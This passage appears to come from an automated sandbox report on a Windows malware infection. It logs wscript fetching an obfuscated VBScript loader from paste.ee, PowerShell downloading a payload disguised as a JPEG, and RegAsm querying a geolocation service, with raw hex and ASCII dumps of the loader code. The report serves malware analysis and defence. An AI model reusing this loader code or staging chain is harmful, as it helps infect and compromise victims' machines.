            Data Ascii: wmOopDZ6AmOcpDW6QlOQpDT6gkOEpDQ6wjO4oDN6AjOsoDK6QiOgoDH6ghOUoDE6wgOIoDB6AQO8nD+5QfOwnD75geOknD45wdOYnD15AdOMnDy5QcOAnDv5gbO0mDs5waOomDp5AaOcmDm5QZOQmDj5gYOEmDg5wXO4lDd5AXOslDa5QWOglDT5gUOElDQ4QFOQhDT4gEAAAA4AUAwAAAA1AcN4WDs1gaNgWDm1AZNIWDg1gXN
            May 27, 2024 09:00:57.974405050 CEST672INData Raw: 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44
            Data Ascii: nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4MwODrzg6MkODozw5MYODlzA5MMODizQ4MAODf
            May 27, 2024 09:00:57.974457979 CEST1236INData Raw: 59 44 48 32 67 68 4e 55 59 44 45 32 77 67 4e 49 55 44 2f 31 67 66 4e 30 58 44 38 31 77 65 4e 6f 58 44 35 31 41 65 4e 63 58 44 32 31 51 64 4e 51 58 44 7a 31 67 63 4e 45 58 44 77 31 77 62 4e 34 57 44 74 31 41 62 4e 73 57 44 71 31 51 61 4e 67 57 44
            Data Ascii: YDH2ghNUYDE2wgNIUD/1gfN0XD81weNoXD51AeNcXD21QdNQXDz1gcNEXDw1wbN4WDt1AbNsWDq1QaNgWDn1gZNUWDk1wYNIWDh1AYN8VDe1QXNwVDb1gWNkVDY1wVNYVDV1AVNMVDS1QUNAVDP1gTN0UDM1wSNoUDJ1ASNcUDG1QRNQUDD1gQNEQD/AAQAwBQBQCQMsFjYxgVMOFDRxoTMwEjJxwRMSEDCw4PM0Dj6wAOMWDDz
            May 27, 2024 09:00:57.974512100 CEST1236INData Raw: 41 57 4e 4f 56 44 50 31 6f 53 4e 59 51 44 31 30 41 4d 4e 77 52 54 61 30 34 43 4e 59 4d 6a 35 7a 6f 39 4d 72 4f 6a 6e 7a 41 32 4d 2f 4d 54 4e 7a 49 69 4d 34 4c 7a 37 79 67 75 4d 6d 4b 7a 6e 79 55 6d 4d 50 4a 44 4f 79 45 6a 4d 49 49 44 41 78 4d 65
            Data Ascii: AWNOVDP1oSNYQD10AMNwRTa04CNYMj5zo9MrOjnzA2M/MTNzIiM4Lz7yguMmKznyUmMPJDOyEjMIIDAxMeMVHjxxYYMsBAAAwHAFAAA/Q1Pm4T++cuPP7jx+kUPC2za94VPR1DR9MAP2zz78gOPhzDZ8kFP7wDF7I/OHvzk782OgtjV78kOypjH4gHOScDV3Y0NzczK30hNWbTy2UrNjazO1kdNgUDG1oAN5TD70EONhSDj0gHN
            May 27, 2024 09:00:57.974544048 CEST1236INData Raw: 50 54 38 7a 63 2b 4d 67 50 54 30 7a 73 38 4d 45 50 54 75 79 30 6a 4d 79 45 6a 30 78 6f 58 4d 30 46 6a 62 78 73 56 4d 4e 46 54 52 78 34 53 4d 6b 45 54 47 78 4d 52 4d 4f 41 54 36 77 41 4f 4d 38 43 44 74 77 55 48 4d 74 42 44 4c 77 45 43 41 41 41 41
            Data Ascii: PT8zc+MgPT0zs8MEPTuy0jMyEj0xoXM0FjbxsVMNFTRx4SMkETGxMRMOAT6wAOM8CDtwUHMtBDLwECAAAAnAQAkAAAA/48PI/TY/k1PL9zQ/ozPx8TK/EyPZ8jD+wvP07D6+AuPX7jz+YsP+6jt+4qPh6Tl+0oPP5zI9cfPQ3jy9QcP+2jt9IbPn2Dm9wYP71zb90VP50jK9wBP6zT98APPczT08wLPvyDp8UHPXxjU80EPCxjJ
            May 27, 2024 09:00:57.974582911 CEST1236INData Raw: 4d 49 4e 39 52 7a 64 30 30 47 4e 5a 51 54 42 7a 38 2f 4d 74 50 54 72 7a 49 35 4d 41 4f 7a 62 7a 59 32 4d 63 4e 44 56 7a 49 6b 4d 36 4c 54 38 79 38 74 4d 59 4c 6a 62 79 30 6c 4d 59 4a 44 54 79 63 6b 4d 30 49 44 4b 79 45 69 4d 4b 45 44 39 78 34 64
            Data Ascii: MIN9Rzd00GNZQTBz8/MtPTrzI5MAOzbzY2McNDVzIkM6LT8y8tMYLjby0lMYJDTyckM0IDKyEiMKED9x4dMPHznxgWMSBjHAAAA0CABwAAAA8T7/I+PH/zo/c4P15zT+EjPT0jz8QOPXzzx8oLPCsjw7A7OjuDm7Q3OEtzN70hOyqjc48MO6aTv2wVNSXDi1MXNZQjxzkrMbLDuygYM3BAAAgFAEACA7MxNFfDq3YlNwXD21sBN
            May 27, 2024 09:00:57.979557037 CEST1236INData Raw: 77 44 49 38 73 78 4f 57 76 44 67 37 77 33 4f 34 74 44 64 37 38 32 4f 6f 74 54 4d 35 4d 59 4f 31 6c 7a 56 35 51 6b 4e 73 61 44 71 32 51 71 4e 67 61 7a 6d 32 59 6c 4e 41 55 44 2f 31 67 66 4e 30 58 7a 37 31 67 65 4e 78 53 7a 41 7a 55 2f 4d 58 50 44
            Data Ascii: wDI8sxOWvDg7w3O4tDd782OotTM5MYO1lzV5QkNsaDq2QqNgazm2YlNAUD/1gfN0Xz71geNxSzAzU/MXPDxzcgMELjvy4qMFKDXyYjMUIjDyAQM7HT9x8eMpHD5x4dMYHj0x0cMHHTwxsbM2GDsxoaMkGznxkZMTGTjxgYMCGDfxYXMxFzaxUWMfFjWxQVMOFDSxMUM9EzNxETMsEjJxASMaETFx8QMJEzAw4PM4Dj8wwOMnDT4


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            12192.168.2.2249177178.237.33.50803972C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            TimestampBytes transferredDirectionData
            May 27, 2024 09:01:03.046850920 CEST71OUTGET /json.gp HTTP/1.1
            Host: geoplugin.net
            Cache-Control: no-cache
            May 27, 2024 09:01:03.683459044 CEST1171INHTTP/1.1 200 OK
            date: Mon, 27 May 2024 07:01:03 GMT
            server: Apache
            content-length: 963
            content-type: application/json; charset=utf-8
            cache-control: public, max-age=300
            access-control-allow-origin: *
            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
            Data Ascii: { "geoplugin_request":"8.46.123.175", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


            HTTPS Proxied Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.2249172188.114.97.34433400C:\Windows\SysWOW64\wscript.exe
            TimestampBytes transferredDirectionData
            2024-05-27 07:00:41 UTC302OUTGET /d/iuC2i HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: paste.ee
            Connection: Keep-Alive
            2024-05-27 07:00:41 UTC1236INHTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:41 GMT
            Content-Type: text/plain; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Cache-Control: max-age=2592000
            strict-transport-security: max-age=63072000
            x-frame-options: DENY
            x-content-type-options: nosniff
            x-xss-protection: 1; mode=block
            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1dqROFPZcJG5K%2BtL1fQjFKKimcx7SafD0t35oPh9SpNNHwlohP4bYOEEA9T3WOKsmlSwumSjiVjsTg%2F%2FWa7du%2BufaMd5Zp3bT1RCJyCPr9T5jP9bEQTEMFmIQg%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 88a421207b81420d-EWR
            alt-svc: h3=":443"; ma=86400
            2024-05-27 07:00:41 UTC133INData Raw: 33 33 64 61 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 61 73 6e 65 69 72 61 64 61 20 2c 20 64 65 73 61 6e 75 76 69 61 72 20 2c 20 74 65 6e 73 6f 72 20 2c 20 6c 69 6d 6f 65 69 72 6f 20 2c 20 61 6c 66 6f 6c 20 2c 20 43 61 6d 61 20 2c 20 61 6c 66 6f 6c 31 0d 0a 20 20 20 20 20 64 65 73 61 6e 75 76 69 61 72 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 74 65 6e 73 6f 72 20 20 3d 20 22 22 20 26 20 6c 69 6d 6f
            Data Ascii: 33da dim asneirada , desanuviar , tensor , limoeiro , alfol , Cama , alfol1 desanuviar = " " tensor = "" & limo
            2024-05-27 07:00:41 UTC1369INData Raw: 65 69 72 6f 20 26 20 64 65 73 61 6e 75 76 69 61 72 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51 42 74 44 67 54 72 65 43 44 67
            Data Ascii: eiro & desanuviar & limoeiro & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDg
            2024-05-27 07:00:41 UTC1369INData Raw: 65 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 64 65 73 61 6e 75 76 69 61 72 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 64 65 73 61 6e 75 76 69 61 72 20 26 20 6c 69 6d
            Data Ascii: ebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & limoeiro & desanuviar & limoeiro & "gBvDgTreHIDgTre" & limoeiro & desanuviar & lim
            2024-05-27 07:00:41 UTC1369INData Raw: 67 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 64 65 73 61 6e 75 76 69 61 72 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 64 65 73 61 6e 75 76 69 61 72 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 22 51 42 75 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 6a 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 47 49
            Data Ascii: gDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & limoeiro & desanuviar & limoeiro & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & limoeiro & desanuviar & limoeiro & "QBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGI
            2024-05-27 07:00:41 UTC1369INData Raw: 44 45 44 67 54 72 65 4e 77 44 67 54 72 65 78 44 67 54 72 65 44 59 44 67 54 72 65 4d 77 44 67 54 72 65 77 44 67 54 72 65 44 63 44 67 54 72 65 4e 67 44 67 54 72 65 7a 44 67 54 72 65 44 51 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 64 65 73 61 6e 75 76 69 61 72 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 22 51 42 43 44 67 54 72 65 48 6b 44 67 54 72 65 64 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44
            Data Ascii: DEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTre" & limoeiro & desanuviar & limoeiro & "QBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsD
            2024-05-27 07:00:41 UTC1369INData Raw: 54 72 65 44 77 44 67 54 72 65 51 67 42 42 44 67 54 72 65 46 4d 44 67 54 72 65 52 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 58 77 42 54 44 67 54 72 65 46 51 44 67 54 72 65 51 51 42 53 44 67 54 72 65 46 51 44 67 54 72 65 50 67 44 67 54 72 65 2b 44 67 54 72 65 43 63 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 64 65 73 61 6e 75 76 69 61 72 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 52 67 42 73 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 64 65 73 61 6e 75 76 69 61 72 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 22 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44
            Data Ascii: TreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTre" & limoeiro & desanuviar & limoeiro & "QBuDgTreGQDgTreRgBsDgTreGEDgTre" & limoeiro & desanuviar & limoeiro & "wDgTregDgTreD0DgTreIDgTreD
            2024-05-27 07:00:41 UTC1369INData Raw: 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 77 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 68 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 64 65 73 61 6e 75 76 69 61 72 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 22 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 64 65 73 61 6e 75 76 69 61 72 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 64 65 73 61 6e 75 76 69 61 72 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 22 51 42 34 44 67 54 72
            Data Ascii: TreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTre" & limoeiro & desanuviar & limoeiro & "DgTreDgTregDgTreCQDgTre" & limoeiro & desanuviar & limoeiro & "QBuDgTreGQDgTreSQBuDgTreGQDgTre" & limoeiro & desanuviar & limoeiro & "QB4DgTr
            2024-05-27 07:00:41 UTC1369INData Raw: 67 44 67 54 72 65 64 44 67 54 72 65 44 67 54 72 65 75 44 67 54 72 65 46 4d 44 67 54 72 65 64 51 42 69 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 79 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 64 65 73 61 6e 75 76 69 61 72 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 22 51 42 34 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 49 44 67 54 72 65 59 51 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 4e 67 44 67 54 72 65 30 44 67 54 72 65 45 77 44 67 54 72 65 22 20 26 20 6c 69
            Data Ascii: gDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & limoeiro & desanuviar & limoeiro & "QB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTre" & li
            2024-05-27 07:00:41 UTC1369INData Raw: 62 67 42 6b 44 67 54 72 65 45 49 44 67 54 72 65 65 51 42 30 44 67 54 72 65 47 55 44 67 54 72 65 63 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 51 44 67 54 72 65 65 51 42 77 44 67 54 72 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 22 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 64 65 73 61 6e 75 76 69 61 72 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 22 44 67 54 72 65 42 42 44 67 54 72 65 48 4d 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 47 30 44 67 54 72 65 59 67 42 73 44 67 54 72 65 48 6b 44 67 54 72 65 4c 67 42 48 44 67 54 72
            Data Ascii: bgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTre" & limoeiro & desanuviar & limoeiro & "DgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTr
            2024-05-27 07:00:41 UTC1369INData Raw: 44 67 54 72 65 62 77 42 75 44 67 54 72 65 48 51 44 67 54 72 65 63 67 42 76 44 67 54 72 65 48 59 44 67 54 72 65 22 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 64 65 73 61 6e 75 76 69 61 72 20 26 20 6c 69 6d 6f 65 69 72 6f 20 26 20 22 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 61 51 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 4a 77 44 67 54 72 65 73 44 67 54 72 65 43 63 44 67 54 72 65 55 67 42 6c 44 67 54 72 65 47 63 44 67 54 72 65 51 51 42 7a 44 67 54 72 65 47 30 44 67 54 72 65 4a 77 44 67 54 72 65 73 44 67 54 72 65 43 63 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 43 6b 44 67 54 72 65 66 51 44 67 54 72 65 67 44 67 54 72 65 48 30 44 67 54 72 65 22 0d 0a 20 20 20 20 20 74 65 6e 73 6f 72 20 3d 20 52 65 70 6c 61 63 65 28 20 74 65 6e 73 6f 72 2c 20 6c
            Data Ascii: DgTrebwBuDgTreHQDgTrecgBvDgTreHYDgTre" & limoeiro & desanuviar & limoeiro & "QByDgTreHQDgTreaQBkDgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre" tensor = Replace( tensor, l


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.2249173188.114.97.34433608C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            2024-05-27 07:00:46 UTC124OUTGET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1
            Host: uploaddeimagens.com.br
            Connection: Keep-Alive
            2024-05-27 07:00:46 UTC696INHTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:46 GMT
            Content-Type: image/jpeg
            Content-Length: 4201093
            Connection: close
            Last-Modified: Tue, 21 May 2024 16:07:14 GMT
            ETag: "664cc6b2-401a85"
            Cache-Control: max-age=2678400
            CF-Cache-Status: REVALIDATED
            Accept-Ranges: bytes
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HHwMex%2FD3QlFPQH0KQ3tWydXS0vB49aus6ynstl28TWfp8bLDY7nbuusP9Yhe%2B2HPMznw1jOO6803%2BdSh1UNRbzWGrrjgORfiTdwdbP36O%2Bt%2B2aI8bYK6zG2KnkAfUUeowF5VaHKYYr1"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 88a4213c8b4e1780-EWR
            alt-svc: h3=":443"; ma=86400
            2024-05-27 07:00:46 UTC673INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
            2024-05-27 07:00:46 UTC1369INData Raw: 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1
            Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
